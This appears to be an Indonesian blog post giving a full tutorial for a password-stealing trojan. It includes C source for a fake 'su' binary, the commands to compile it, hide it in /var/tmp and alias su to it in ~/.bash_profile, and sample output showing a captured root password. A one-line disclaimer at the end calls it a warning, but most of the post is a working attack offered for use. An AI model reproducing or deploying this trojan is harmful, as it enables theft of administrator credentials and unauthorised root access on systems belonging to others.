6.19.2010

Mendapatkan Password root dengan Jebakan.

Pernahkan anda merasa jengkel saat anda melakukan sesuatu di mesin Linux dengan account user biasa semua serba terbatasi. atau jika anda sudah mendapatkan file passwd dan shadow untuk di crack dengan John the Ripper dengan brute forcenya, tetapi anda malas untuk menunggu proses cracking selesai, (bisa botak tumbuh paku mas kenthir nungguinnya :( )

kali ini sang admin akan kita bohongi, perintah dalam linux untuk login menjadi super user atau menjadi admin yaitu dengan mengetikkan perintah "su" lalu dilanjutkan dengan mengetikan password, nah kita akan memasang program jebakan, jadi, ketika sang admin mengetikkan perintah "su" otomatis program akan menjalankan program "su" yang kita alias ke program yang kita tentukan letakkan dengan perintah "alias" menggunakan perintah "alias", lebih lanjut silahkan baca manualnya

uname@slacker:~$ man alias

di bawah ini adalah source code dari program ".su" yang mengecoh admin dibuat oleh salah seorang staf kecoak-elektronik Indonesia, Pseudoanonymous.

------------ The Code ----------------


/*
* su "evil" brought to you by Kecoak's C SHell
* (c) 2007 Kecoak Elektronik Indonesia
*
* Still alive to break and burn the sky
* Still decided to take overing the network use unusual ways
* Still silent and keep the underground spirit!
*
* 1. gcc -O2 -o .su su.c
* 2. mv .su /var/tmp/.su
* 3. echo "alias su=/var/tmp/.su" >> ~/.bash_profile
*/

#include
#include
#include

#define SU "/bin/su" /* better search the correct path */
#define PASSWD "/var/tmp/.passwd"
#define LOCK "/var/tmp/.su.lock"

extern char **environ;

int main(int argc, char **argv) {
char *pass;
char *user;
char *ruser;
FILE *inFile;

switch(argc) {
case 1:
user = "root";
break;
case 2:
if(!strncmp("-", argv[1], 1)) {
user = "root";
}
else {
user = argv[1];
}
break;
case 3:
user = argv[2];
break;
}

if((inFile = fopen(LOCK, "r")) != NULL) {
unlink(LOCK);
argv[0] = SU;
execve(argv[0], argv, environ);
}

if((inFile = fopen(PASSWD, "a+")) == NULL) {
execle(SU, SU, argv[1], argv[2], NULL, environ);

#ifdef DEBUG
perror("open() on PASSWD file");
#endif
}

pass = getpass("Password: ");

ruser = getenv("USER");
fprintf(inFile, "%s tried %s / %s\n", ruser, user, pass);
fclose(inFile);

inFile = fopen(LOCK, "w");
fclose(inFile);
printf("su: Permission denied\nSorry\n");

return 0;
}


------------ End of Code ----------------

Saya tidak menjelaskan baris per baris bagaimana program ini bekerja, karena mas kenthir malas menulisnya hehehe,, silahkan anda pahami sendiri ,, :)
Silahkan kompile menggunakan gcc

uname@slacker:~$ gcc -O2 -o .su su.c

jika ada warning, biarkan saja, lalu pindahkan ke direktori /var/tmp agar tidak terlalu mencurigakan,

uname@slacker:~$ mv .su /var/tmp/.su

file ".su" akan hidden di direktori /var/tmp, setting "alias" akan selalu ada di load di dalam "bash" atau "shell" pada file ".bash_profile" dengan mengetikkan perintah,

uname@slacker:~$ echo "alias su=/var/tmp/.su" >> ~/.bash_profile

nah, pada tahap ini semua persiapan sudah beres, tinggal menunggu si admin menjalankan perintah "su" yang akan pada akhirnya akan menjalankan program
"/var/tmp/.su" (licik juga kau ???)

uname@slacker:~$ su
Password:
su: Permission denied <--- hanya tipuan, seakan-akan admin salah mengetikkan password, padahal password sudah di capture Sorry uname@slacker:~$ su Password: root@slacker:/home/uname# <--- login sekali lagi, admin berhasil login dan setelah kecelakaan di atas, sekarang kita nikmati hasil jebakannya , dengan mengetikkan perintah, uname@slacker:~$ vi /var/tmp/.passwd lalu muncul seperti di bawah ini, diketahui user biasa adalah "uname" dan mencoba password "root" "guegila123" uname tried root / guegila123 +++++++++++++++++++++++++++++++++++++++++ Artikel ini bertujuan untuk memperingatkan kepada kita tidak ada yang 100% aman dari sistem komputer, dan selalu waspada terhadap data-data penting di mesin kita, jangan gunakan trik di atas di mesin yang bukan milikmu, jika melanggar, segeralah bertaubat, kiamat udah deket booozzz .. :)

Tidak ada komentar:

Posting Komentar